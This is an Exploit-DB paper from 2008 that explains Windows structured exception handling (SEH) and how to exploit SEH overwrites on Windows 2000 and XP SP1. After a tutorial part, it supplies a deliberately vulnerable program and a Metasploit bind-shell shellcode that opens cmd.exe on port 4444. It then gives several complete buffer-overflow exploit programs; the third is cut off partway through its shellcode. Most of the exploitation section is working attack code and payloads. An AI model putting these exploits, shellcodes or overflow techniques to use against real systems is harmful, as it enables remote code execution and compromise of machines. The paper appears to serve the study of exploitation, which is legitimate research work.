Playing around with (old?) SEH

EDB-ID:

13036

CVE:

N/A

Author:

suN8Hclf

Type:

papers

Platform:

Multiple

Published:

2008-08-18

                     ..//..//..//..//..//.|.\\..\\.\\..\\..\\..
                    [-]                                      [+]
                    [+]     Playing around with (old?)SEH    [-]
                    [-]     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    [+]
                    [+]                                      [-]
                    [-]     bY suN8Hclf aka crimsoN_Loyd9    [+]
                    [+]                                      [-]
                    [-]   DaRk-CodeRs Group production, kid  [+]
                    [+]                                      [-]
                    [-]          www.dark-coders.pl          [+]              
                    [+]                                      [-]
                    [-]              08.06.2008              [+]
                    [+]                                      [-]
                    [-]        suN8Hclf[at]vp{dot}.pl        [+]
                    [+]   crimson{dot}loyd[at]gmail{dot}com  [-]
                    [-]                                      [+]
                     ..\\..\\..\\..\\..\\.|.//..//..//..//..//..



[>>1<<]. Introduction
[>>2<<]. SEH (Structured Exception Handler)
[>>3<<]. Coding SEH
         [>a<] introduction
         [>b<] implementation
[>>4<<]. Exploiting SEH
         [>a<] shellcodes
         [>b<] vulnerable vuln.exe
         [>c<] WIN2000 vs. WINXP SP1 (EBX vs. ESP)
               [***exploit1.c](classic overflow)
               [***exploit2.c](using 2 bytes short reverse jump)
               [***exploit3.c](using long reverse jump)
               [***exploit4.c](execution in TEB block)
[>>5<<]. Summary
[>>6<<]. Further reading
[>>7<<]. Greetz



NOTE: Please excuse my poor English, its not my mother language.



><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>               [>>1<<]. Introduction                     <
>---------------------------------------------------------<



This paper is about a very powerful but not so good documented mechanism,
which was introduced and implemented in Windows 2000 SP1-SP4 and XP SP0-SP1,
and is called Structured Exception Handler (in summary SEH).

Someone can think that writing about quite old implementations is wasting of time,
in times when we have protections such as DEP (Data Execution Prevention), /GS
or /SAFESEH switches. But, in my opinion, this paper contains a good introduction
into the SEH's workings and provides firm bases to understand exploitation
methods in Windows Server 2003, Windows XP SP2 or Windows Vista platforms.

This paper is an attempt to show and discuss SEH, from the coding and exploitation
side.

At the beginning, I will show how to write our own implementation of try, except 
and finally instructions, later I will discuss some methods of abusing SEH and 
at the end, I will show 4 completely working exploits, which abuses SEH to execute 
any code.

For better understanding of this paper, I recommend you to read my article:
"Shellcode locations and buffer overflows in Windows" [1]

Ok, so lets go!!!


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>      [>>2<<]. SEH (Structured Exception Handler)        <
>---------------------------------------------------------<


Structured Exception Handler is a piece of code, that is executed
in case of a problem during the execution of a process. This problem can be:

1.disruption of the access privilidges
2.division by 0
3.an attempt to read or write from/to forbidden memory areas
It can be also used as a trick to complicate debugging process.

When we call a function, a special "frame of calling" is created on the stack.
The information about exception handler procedure is than put down into 
that "frame of calling" in the EXCEPTION_REGISTRATION structure. This structure 
contains two elements: a pointer to the next EXCEPTION_REGISTRATION structure (*next) 
and a pointer to the right exception handler procedure (*handler). It is very important
that every process's thread has at least one exception handler procedure, that is 
created (the EXCEPTION_REGISTRATION structure) during the thread creation and it is 
always located at the beginning of the segment pointed by FS register. The last 
position on the list, contains -1(0xFFFFFFFF) value and the address of RtlUnwind 
funtion, which is not documented but it is located in kernel32.dll library.

EXCEPTION_REGISTRATION structure looks like the following(C style):

typedef struct EXCEPTION_REGISTRATION{
	EXCEPTION_REGISTRATION *next;
	PEXCETION_HANDLER *handler;
}EXCEPTION_REGISTRATION, *PEXCEPTION_REGISTRATION;


And the linked list of EXCEPTION_REGISTRATION structures looks like this:


               __________________________________
               |Thread Information Block(fs:[0])|----------+
               |           ...                  |          |
               |           ...                  |          |
               |      EXCEPTION_REGISTRATION    |          |
               +--------------------------------+          |
                                                           |
                                                           |
              +----------------------------------+         |
              |     EXCEPTION_REGISTRATION       | <-------+
              +----------------------------------+
              |    [Handler Callback Pointer]    | 
              |                                  |
    +---------|             [*next]              |
    |         +----------------------------------+
    |
    |         +----------------------------------+         
    +-------->|     EXCEPTION_REGISTRATION       | 
              +----------------------------------+         
              |    [Handler Callback Pointer]    |         
              |                                  |         
              |             [*next]              |---------+         
              +----------------------------------+         |
                                                           |
              +----------------------------------+         |
              |     EXCEPTION_REGISTRATION       | <-------+
              +----------------------------------+
              |    [Handler Callback Pointer]    | 
              |                                  |
     +--------|             [*next]              |
     |        +----------------------------------+
     |
     |
     |        +----------------------------------+         
     +------->|          (END OF LIST)           |
              +----------------------------------+
              |           0xFFFFFFFF             |
              +----------------------------------+



><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                  [>>3<<]. Coding SEH                    <
>---------------------------------------------------------<


Lots of programming languages has a set of special instructions to install
exception handler procedures. For instance: In C/C++ there is a construction:
try, except/catch, finally, that catches the exception. Basically, this instructions
only modify the linked list of EXCEPTION_REGISTRATION structures, therefore we 
wont use them and for better and deeper understanding of this mechanism, we will 
write everything in Assembly language(masm32).


>>>>>>>>>>>>>>>>[>a<] introduction
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's assume that this code appeared in a program(from OllyDbg):

00401000    .  B8 40000000              MOV EAX,40
00401005    .  33C9                     XOR ECX,ECX
00401007    .  F7F9                     IDIV ECX
00401009    .  6A 00                    PUSH 0                            [!]
0040100B    .  E8 00000000              CALL <JMP.&kernel32.ExitProcess>  [!]

This code on the 100 percent will raise an exception (division by zero is impossible). 
The two last instructions wont be executed. Here is a program behaviour when the 
exception will accure:

ntdll!KiUserExceptionDispatcher

77FA15FC     8B1C24                     MOV EBX,DWORD PTR SS:[ESP]
77FA15FF     51                         PUSH ECX
77FA1600     53                         PUSH EBX                 ; kernel32.79340000
77FA1601     E8 F13AFFFF                CALL ntdll.77F950F7 ------+
                                                                  |
                                                                  |
                                                                  |
                                                                  |
77F950F7     55                         PUSH EBP    <-------------+
77F950F8     8BEC                       MOV EBP,ESP
77F950FA     83EC 60                    SUB ESP,60
77F950FD     53                         PUSH EBX
77F950FE     56                         PUSH ESI      ; kernel32.GetProcAddress
77F950FF     8D45 F4                    LEA EAX,DWORD PTR SS:[EBP-C]
77F95102     57                         PUSH EDI      ; kernel32.79397598
77F95103     50                         PUSH EAX
77F95104     8D45 F8                    LEA EAX,DWORD PTR SS:[EBP-8]
77F95107     50                         PUSH EAX
77F95108     E8 779AFFFF                CALL ntdll.77F8EB84
77F9510D     E8 8D9AFFFF                CALL ntdll.77F8EB9F
77F95112     8365 FC 00                 AND DWORD PTR SS:[EBP-4],0
77F95116     8BD8                       MOV EBX,EAX
77F95118     83FB FF                    CMP EBX,-1
77F9511B     0F84 C1CC0100              JE ntdll.77FB1DE2
77F95121     8B75 08                    MOV ESI,DWORD PTR SS:[EBP+8] 
77F95124     3B5D F8                    CMP EBX,DWORD PTR SS:[EBP-8] ; kernel32.79348EC8
77F95127     8D43 08                    LEA EAX,DWORD PTR DS:[EBX+8]
77F9512A     0F82 AECC0100              JB ntdll.77FB1DDE
77F95130     3B45 F4                    CMP EAX,DWORD PTR SS:[EBP-C] ; kernel32.7935F0B4
77F95133     0F87 A5CC0100              JA ntdll.77FB1DDE
77F95139     F6C3 03                    TEST BL,3
77F9513C     0F85 9CCC0100              JNZ ntdll.77FB1DDE
77F95142     F605 86F5FC77 80           TEST BYTE PTR DS:[77FCF586],80
77F95149     0F85 18CC0100              JNZ ntdll.77FB1D67
77F9514F     FF73 04                    PUSH DWORD PTR DS:[EBX+4]
77F95152     8D45 F0                    LEA EAX,DWORD PTR SS:[EBP-10]
77F95155     50                         PUSH EAX
77F95156     FF75 0C                    PUSH DWORD PTR SS:[EBP+C]
77F95159     53                         PUSH EBX
77F9515A     56                         PUSH ESI          ; kernel32.GetProcAddress
77F9515B     E8 E599FFFF                CALL ntdll.77F8EB45 -------+
                                                                   |
                                                                   |
                                                                   |
                                                                   |
77F8EB45     BA B651F977                MOV EDX,ntdll.77F951B6 <---+
77F8EB4A     55                         PUSH EBP
77F8EB4B     8BEC                       MOV EBP,ESP
77F8EB4D     FF75 0C                    PUSH DWORD PTR SS:[EBP+C]
77F8EB50     52                         PUSH EDX
77F8EB51     64:FF35 00000000           PUSH DWORD PTR FS:[0]
77F8EB58     64:8925 00000000           MOV DWORD PTR FS:[0],ESP
77F8EB5F     FF75 14                    PUSH DWORD PTR SS:[EBP+14]
77F8EB62     FF75 10                    PUSH DWORD PTR SS:[EBP+10]
77F8EB65     FF75 0C                    PUSH DWORD PTR SS:[EBP+C]
77F8EB68     FF75 08                    PUSH DWORD PTR SS:[EBP+8]
77F8EB6B     8B4D 18                    MOV ECX,DWORD PTR SS:[EBP+18]    [4]
77F8EB6E     FFD1                       CALL ECX                         [5]


This code can be long analized to get to know all details how Windows prepares the
handling of exceptions. But, it is not essential at this moment. The most
important thing, is to understand general conception, which is presented below:

1. When an exception occures, program jumps to KiUserExceptionDispatcher
2. Then the RTLTraceDatabaseEnumerate function's code is executed
3. Later, the piece of RTLConvertlongToLargeInteger's code
4. Finally, the address of the exception handler procedure is loaded into
   ECX register ([4]).This is the address from the first structure pointed by
   fs:[0].
5. There is a jump to the exception handler procedure (call ECX) ([5])
6. Now the exception handler procedure has the full control over a program's behaviour.
   This procedure can for example close the process in the "elegant" way or try to repair 
   the "thing", that caused an exception.                          


>>>>>>>>>>>>>>[>b<] implementation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Now, when we know the basics of the exceptions handling, we can write our own
"implementation" of the try, except/catch, finally construction. To achieve this
we have got to create our own EXCEPTION_REGISTRATION structure and insert it
at the beginning of the linked list. So fs:[0] should point to our structure. The
general idea is showed below:


BEFORE
------------------

fs:[0]  ->>> |EXCEPTION_REGISTRATION1|  ->>> |EXCEPTION_REGISTRATION2|  .... ->>> 0xFFFFFFFF


AFTER
------------------

fs:[0]  ->>> |OUR_EXCEPTION_REGISTRATION1| ->>> |EXCEPTION_REGISTRATION1| .... ->>>> 0xFFFFFFFF


To accomplish the state showed above, we have got to do the following:

1. Save the pointer from FS:[0], that points to the first EXCEPTION_REGISTRATION
2. Create our own EXCEPTION_REGISTRATION structure where:
   a> the *handler pointer points to our own exception handler procedure
   b> we set the address to the function, which will be "always" executed (finally
      instruction) 
   c> the *next pointer points to the remembered address of the original first 
      EXCEPTION_REGISTRATION structure (original FS:[0] value)
3. Set the address from FS:[0] to point to our EXCEPTION_REGISTRATION structure
4. Save current values of the stack pointer and the frame pointer (ESP and EBP)

To do the second point we can use the following structure:

---------------------------------CODE----------------------------------
SEH struct
	PrevLink dd ?  		; [1]
	CurrentHandler dd ?	; [2]
	SafeOffset dd ?	        ; [3]
	PrevEsp dd ?		; [4]
	PrevEbp dd ?		; [5]
SEH ends
---------------------------------CODE----------------------------------

[1] -> address of the first EXCEPTION_REGISTRATION structure (fs:[0])
[2] -> address of our structured handler procedure
[3] -> address of the procedure to execute "despite of everything" (finally instruction) 
[4] -> current ESP value
[5] -> current EBP value

Next actions:

ad 1.   push fs:[0]
ad 2.a) mov seh.CurrentHandler, OFFSET myFunc
     b) mov seh.SafeOffset, OFFSET final
     c) pop seh.PrevLink
ad 3.   lea eax, seh
        mov fs:[0], eax
ad 4.   mov seh.PrevEsp,esp
        mov seh.PrevEbp,ebp


Here is an exemplary program:


---------------------exception_implementation.asm-----------------

; Compilation:  ml /Cp /c /coff exception_implementation.asm
; Linking    :  link /subsystem:windows exception_implementation.obj


.386
.model flat,stdcall
option casemap:none

include d:\masm32\include\windows.inc
include d:\masm32\include\kernel32.inc
include d:\masm32\include\user32.inc
includelib d:\masm32\lib\user32.lib
includelib d:\masm32\lib\kernel32.lib

SEH struct
	PrevLink dd ?		
	CurrentHandler dd ?	
	SafeOffset dd ?	
	PrevEsp dd ?		
	PrevEbp dd ?		
SEH ends

.data
napis  db "IN exception",0
napis2 db "OUT of Exception",0
tytul  db "Hello",0

.code
start proc
LOCAL seh:SEH

assume fs:nothing
push fs:[0]
pop seh.PrevLink
mov seh.CurrentHandler,offset SEHHandler
mov seh.SafeOffset,offset FinalExit
lea eax,seh
mov fs:[0], eax
mov seh.PrevEsp,esp
mov seh.PrevEbp,ebp

; Now the structured handler procedure has been installed. Every exception
; will execute OUR function (SEHHandler)

mov eax, 40h
mov ecx, 0
idiv ecx        ;lets cause an exception... ;>


FinalExit:
invoke MessageBox, NULL, addr napis2, addr tytul, MB_OK
invoke ExitProcess, 0	
start endp

SEHHandler proc C uses edx pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD
	mov edx,pFrame		
	assume edx:ptr SEH
	mov eax,pContext
	assume eax:ptr CONTEXT
	push [edx].SafeOffset
	pop [eax].regEip           
	push [edx].PrevEsp
	pop [eax].regEsp
	push [edx].PrevEbp
	pop [eax].regEbp
      
	invoke MessageBox, NULL, ADDR napis,ADDR tytul, MB_OK

	mov eax,ExceptionContinueExecution
	ret
SEHHandler endp

end start

---------------------exception_implementation.asm-----------------


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                  [>>4<<]. Exploiting SEH                <
>---------------------------------------------------------<


>>>>>>>>>>>>>>>>[>a<] shellcodes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

During this paper I will be using two shellcodes:

>The first one<:

"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x33\xC9\x83\xC3"
"\x35\x88\x0B\x83\xEB\x06\x53\xB8\xCF\x05\x35\x79\xFF\xD0"
"\x33\xC9\x51\x53\x53\x51\x05\x11\x11\x11\x11\x2D\x79\x90"
"\x0E\x11\xFF\xD0\x33\xC9\x51\xB8\x1A\xE0\x34\x79\xFF\xD0"
"\x75\x73\x65\x72\x33\x32\x61";

In details:

00401B7C     EB 02          JMP SHORT vuln.00401B80
00401B7E     EB 05          JMP SHORT vuln.00401B85
00401B80     E8 F9FFFFFF    CALL vuln.00401B7E
00401B85     5B             POP EBX
00401B86     33C9           XOR ECX,ECX
00401B88     83C3 35        ADD EBX,35
00401B8B     880B           MOV BYTE PTR DS:[EBX],CL
00401B8D     83EB 06        SUB EBX,6
00401B90     53             PUSH EBX
00401B91     B8 CF053579    MOV EAX,KERNEL32.LoadLibraryA  //check the address of LoadLibraryA on your own
00401B96     FFD0           CALL EAX
00401B98     33C9           XOR ECX,ECX
00401B9A     51             PUSH ECX
00401B9B     53             PUSH EBX
00401B9C     53             PUSH EBX
00401B9D     51             PUSH ECX
00401B9E     05 11111111    ADD EAX,11111111  
00401BA3     2D 79900E11    SUB EAX,110E9079 
00401BA8     FFD0           CALL EAX                 //here, in eax should be an address of 
00401BAA     33C9           XOR ECX,ECX              //MessageBoxA function
00401BAC     51             PUSH ECX
00401BAD     B8 1AE03479    MOV EAX,KERNEL32.ExitProcess      //address of ExitProcess
00401BB2     FFD0           CALL EAX
00401BB4     75 73          JNZ SHORT vuln.00401C29          //coded 'user32.dll' string
00401BB6     65:72 33       JB SHORT vuln.00401BEC
00401BB9     3261           XOR AL,BYTE PTR DS:[EAX]

Wow, I have written it under Windows 2000 Service Pack 4 Polish. If you are
using another Windows platform, you should change address of LoadLibraryA,
MessageBoxA and ExitProcess in kernel32 and User32 to good ones.
As you can see, this simple code simply invokes MessageBoxA and then
it terminates the process.

>The second one<

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ]  
//http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";


The second, was generated in Metasploit Framework. It binds
Windows shell (cmd.exe) to port 4444 and waits for a connection.


>>>>>>>>>>[>b<] vulnerable vuln.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Generally speaking, during the process of exploitation, we want to overwrite the
*handler pointer. This is the only thing that we have got to do, when we want our code 
be executed during an exception.
Ok, so now an exception accures...
Then, the overwritten *handler pointer is loaded into the ECX register and there
is a call to it (call ECX). And now we have a problem...
Where should we jump?

In Windows 2000 SP1-SP4 and Windows XP Unpatched, during the preparation to execute 
Structured Exception Handler and during the execution of the *handler code, the EBX register 
points to the current EXCEPTION_REGISTRATION structure. The easiest way to execute our
own code looks like the following:

1. The *next field should be overwritten with the short 6 bytes ahead jump
2. The *handler field should be overwritten with a jump to EBX (jmp EBX, call EBX
   push EBX-ret)
3. We put our shellcode with a NOP sledge behind the EXCEPTION_REGISTRATION structure

Before we test this idea, lets write a very easy and vulnerable program:

----------------vuln.c---------------------
#include <stdio.h>
#include <windows.h>

int main(int argc, char *argv[])
{
  char buffer[300];
  int a;
  strcpy(buffer, argv[1]);   [1]   
  a=3/0;                     [2]                    
  return 0;
}
---------------vuln.c----------------------

Before we start, lets make some guide lines. First of all, to accomplish
the scenario, which I have described above, it is essential to cause an 
exception in the vulnerable program. If we run the vuln.exe program with
a short string, it will crash on the [2] instruction. It will raise an exception,
a default *handler procedure will be executed, program will be terminated and
we will lose a chance to gain administrator privileges :).
On the other side the instuction above[2], copies data to the constant sized
buffer on the stack and it does not check the data's length. So we can cause
buffer overflows and execute our code. Of course, in practice there would not
be instruction[2] because the overwritten EIP register(classic buffer overflow)
would cause an exception. [2] is only here, to show that program wont crash
during division by 0, and it will execute any code.


[NOTE1 !!!!!]
*******************************************************************************
*To make our thinking much easier lets assume that 416 bytes is the maximum of*
*data that DOES NOT overwrite the *next pointer int the EXCEPTION_REGISTRATION*
*structure on the stack.                                                      *

[NOTE2!!!!]
*******************************************************************************
*All constants values in the exploits's code ware counted during testing and  *
*debugging. It is a mistake to assume that they are good in all conditions.   *
*If you exactly understand a method of exploitation, you wont have any        *
*problems to choose the right "constant" values.                              *


>>>>>>>>[>c<] WIN2000 vs. WINXP SP1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As I have written above in Win2000 and unpatched WINXP, during the preparation
to execute and execution of the exception handler procedure, the EBX register
points to the current EXCEPTION_REGISTRATION structure. In this case the situation
is quite simple. We overwrite the *handler poiner with the jmp to the EBX and 
we have full control over the program execution.

The problem occures in Windows XP SP1. Here, the code, that prepares to pass the
control to exception handler procedure, is additionally supplemented with zero-ing
"crytical" registers:


(from ntdll.dll):

7C903767    53              PUSH EBX
7C903768    56              PUSH ESI
7C903769    57              PUSH EDI                     ; ntdll.7C910738
7C90376A    33C0            XOR EAX,EAX
7C90376C    33DB            XOR EBX,EBX    <-- fuck, and what we gonna do now? ;( 
7C90376E    33F6            XOR ESI,ESI
7C903770    33FF            XOR EDI,EDI                  ; ntdll.7C910738

Later, there is useless for us code and then there is an execution of the
exception handler procedure (the same as in Win2000):

(from ntdll.dll)

7C903799    55              PUSH EBP
7C90379A    8BEC            MOV EBP,ESP
7C90379C    FF75 0C         PUSH DWORD PTR SS:[EBP+C]
7C90379F    52              PUSH EDX                                 ; ntdll.7C9037D8
7C9037A0    64:FF35 0000000>PUSH DWORD PTR FS:[0]
7C9037A7    64:8925 0000000>MOV DWORD PTR FS:[0],ESP
7C9037AE    FF75 14         PUSH DWORD PTR SS:[EBP+14]
7C9037B1    FF75 10         PUSH DWORD PTR SS:[EBP+10]
7C9037B4    FF75 0C         PUSH DWORD PTR SS:[EBP+C]
7C9037B7    FF75 08         PUSH DWORD PTR SS:[EBP+8]
7C9037BA    8B4D 18         MOV ECX,DWORD PTR SS:[EBP+18]  <-- *handler to ECX
7C9037BD    FFD1            CALL ECX                  <-- jump to exception handler procedure

So, when Windows passes the control to the exception handler procedure, the EBX
register contains 0. We cannot simply jump to EBX because this will raise another
exception and program will be terminated immediately. The situation seems very
bad but if we only look at the stack image before the execution of *handler procedure
we will find the solution very fast.

ESP   ->   the return address (somewhere in ntdll.dll)
ESP+4 ->   the exception's indicator
ESP+8 ->   the address of the EXCEPTION_REGISTRATION structure

So, instead of jumping to EBX we can:

1. jmp dword ptr[esp+8]
2. pop - pop - ret

The second sequence will add 8 to ESP and then will jump to the address, that is on the
top of the stack.

Now, we know everything so we can start exploiting SEH :)


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
&>&>&<&><&>&<>&<>&<&><&>666[***exploit1.c]666<&><&>&<>&<>&<&><&>&<&<&
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                          (classic overflow)


As I have written before, we pass to the vuln.exe the folowing string:

                        +--------->-------->-----------+
                        |                              |
[416 bytes of trash][jmp 6][jmp ebx, pop-pop-ret][some NOPs][shellcode]


--------------------------------exploit1.c-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET 0x79396DBE    // the address of jmp ebx (win2000) or pop-pop-ret (win XP SP2)
#define JUMP 0x909006EB   // jmp 6

#define TRASH 0x41

char shellcode[]=
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x33\xC9\x83\xC3"
"\x35\x88\x0B\x83\xEB\x06\x53\xB8\xCF\x05\x35\x79\xFF\xD0"
"\x33\xC9\x51\x53\x53\x51\x05\x11\x11\x11\x11\x2D\x79\x90"
"\x0E\x11\xFF\xD0\x33\xC9\x51\xB8\x1A\xE0\x34\x79\xFF\xD0"
"\x75\x73\x65\x72\x33\x32\x61";

int main(int argc, char *argv[])
{
char *bufExe[3];
char buf[700];
int i;
char *ptr = buf;

memset(buf, 0, sizeof(buf));
bufExe[0] = "vuln.exe";
bufExe[2] = NULL;

for(i=0;i<416;i++)
(*ptr++) = TRASH;

*(unsigned long *)&buf[416] = JUMP;
*(unsigned long *)&buf[420] = RET;
strcat(buf, "\x90\x90\x90\x90");
strcat(buf, shellcode);
bufExe[1] = buf;
execve(bufExe[0],bufExe,NULL);	
return 0;
}
--------------------------------exploit1.c-------------------------------


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
&>&>&<&><&>&<>&<>&<&><&>666[***exploit2.c]666<&><&>&<>&<>&<&><&>&<&<&
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                  (using 2 bytes short reverse jump)


Another interesting way to abuse SEH is to use 2-bytes reverse short jump. 
Instead of placing shellcode behind the EXCEPTION_REGISTRATION structure, we put it 
in the vuln.exe's buffer and we use short reverse jump to execute the code.
A great article about 2-bytes reverse short jumps can be found at[2]


       +-------<----------<-------<-----------+
       |                                      |
[NOP Sledge][shellcode][some NOPS][short reverse jump][jmp ebx, pop-pop-ret]


--------------------------------exploit2.c-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET 0x79392C0B      //jmp ebx, pop-pop-ret
#define JUMP 0x909080EB     //short reverse jump (jmp 80)

#define TRASH 0x90

char shellcode[] = 
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x33\xC9\x83\xC3"
"\x35\x88\x0B\x83\xEB\x06\x53\xB8\xCF\x05\x35\x79\xFF\xD0"
"\x33\xC9\x51\x53\x53\x51\x05\x11\x11\x11\x11\x2D\x79\x90"
"\x0E\x11\xFF\xD0\x33\xC9\x51\xB8\x1A\xE0\x34\x79\xFF\xD0"
"\x75\x73\x65\x72\x33\x32\x61";
                
int main(int argc, char *argv[])
{
char *bufExe[3];
char buf[700];
int i;
char *ptr = buf;

memset(buf, 0, sizeof(buf));
bufExe[0] = "vuln.exe";
bufExe[2] = NULL;

for(i=0;i<310;i++)
(*ptr++) = TRASH;

strcat(buf, shellcode);                  
for(i=sizeof(shellcode)+307;i<416;i++)
strcat(buf, "\x90");

*(unsigned long *)&buf[416] = JUMP;
*(unsigned long *)&buf[420] = RET;

bufExe[1] = buf;
execve(bufExe[0],bufExe,NULL);	
return 0;
}
--------------------------------exploit2.c-------------------------------


As you can see, it is very important to jump to the NOPS before the shellcode.
Short jumps are... SHORT !!! :) so shellcode should be as near as possible to
EXCEPTION_REGISTRATION structure.


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
&>&>&<&><&>&<>&<>&<&><&>666[***exploit3.c]666<&><&>&<>&<>&<&><&>&<&<&
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                      (using long reverse jump)


Till now, we were playing with quite small (short) shellcode (the first one).
To execute larger shellcodes (400 bytes in our case) we have got to find 
a place for it. Here the knowledge from my paper [1] will be very very useful.
As you probably know, we cannot use the first method to execute our second
shellcode because it will be cut (shellcode). The second method with short jump
would also fail because the range of the jump is too small. It wont jump
over 400 bytes of shellcode + some NOP's.

The good idea is a small modyfication of the second method. We also place our
shellcode in the vuln.exe's buffer and we ALSO jump there but in another way :)
To accomplish it, we have got to know the approximate location of the shellcode
on the stack. In case of Win2000 it is very simple, because the EBX register
points to the current EXCEPTION_REGISTRATION structure, so the buffer must be
somewhere before the structure.

But on Win XP SP1 there is a problem because the EBX register is zeroed, therefore
we have got to find another point of reference to count the address, where the
shellcode was placed. We can use the current stack pointer (ESP). But this time,
we have got to add a value to ESP and than jump.


--------------------------------exploit3.c-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET 0x79392C0B          //jmp ebx or pop-pop-ret
#define JUMP 0x909006EB         //jump 6

char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
